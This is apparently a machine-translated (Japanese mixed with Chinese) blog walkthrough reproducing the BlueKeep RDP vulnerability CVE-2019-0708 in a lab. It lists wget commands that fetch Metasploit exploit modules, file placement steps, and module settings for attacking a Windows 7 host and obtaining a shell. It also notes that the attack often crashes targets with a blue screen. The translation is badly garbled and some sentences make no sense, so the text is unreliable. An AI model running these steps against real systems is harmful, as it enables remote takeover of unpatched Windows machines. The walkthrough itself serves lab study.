CVE-2019-0708は、再現性を悪用します

CVE-2019-0708は、再現性を悪用します

今再びそれを再実行し、ドキュメントを書く時間がありませんでした忙しいまで、この脆弱性は、数ヶ月のためにそこから飛び出します。

環境を準備します。
win7靶机 IP地址:172.16.15.118
Kali攻击机 IP地址:172.16.15.50

モジュールは表示されませんときには、最新のカーリー、または負荷CVE-2019から0708にマシン上でそのMSFツールを思い出したする必要があります

ダウンロードの脆弱性モジュール
# 直接在kali中使用命令下载
wget https://raw.githubusercontent.com/rapid7/metasploitframework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploitframework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploitframework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploitframework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
あなたは、ファイルをダウンロードしたら、次のように:

1573702325703

指定された場所にファイルを移動します。
rdp.rb 移动到 /usr/share/metasploit-framework/lib/msf/core/exploit 目录

rdp_scanner.rb和cve_2019_0708_bluekeep.rb放到/usr/share/metasploitframework/modules/auxiliary/scanner/rdp 目录

cve_2019_0708_bluekeep_rce.rb 放进/usr/share/metasploitframework/modules/exploits/windows/rdp 目录,这里需要注意如果没有rdp这个目录就去创建个。

環境準備

開発します

Msfconsoleは、第1のフレームワークMSFの攻撃に入ります

1573702498628

入力reload_allモジュールがリロードされます

1573702681465

私たちが使用しようとしている検索CVE-2019から0708の脆弱性クエリモジュールを入力します。

1573702753955

私たちの脆弱性モジュールが正常ににロードされています

使用することで/窓/ RDP / cve_2019_0708_bluekeep_rceコマンドモジュールコールを利用します

モジュールの入力を入力した後のオプションは、我々はパラメータのビューを設定する必要が示して

1573702904605

あなたは、パラメータの特定の値が分からない場合は、showコマンドを通じて確認することができます

設定:

设置靶机IP地址:set RHOSTS 172.16.15.118
设置攻击端口:set rport 3389
设置targets ID:set target 4

1573703184626

攻撃するために実行するコマンドを使用するか、利用します

1573703257028

ここを参照してください、私たちは、シェルの目標を成功裏に取得しています

まとめと課題:

1.とき攻撃はドローンをヒットすることは非常に容易であること、脆弱性がしますブルースクリーンあなたが成功せず、ではなく、コンピュータサービスのテスト中に数回をしようとした場合

それがロードされていない場合、それは最新のMSFに更新されるとき2.ロードの脆弱性モジュールは、再度、ダウンロードを再コピーします

おすすめ

転載: www.cnblogs.com/yanlzy/p/11856091.html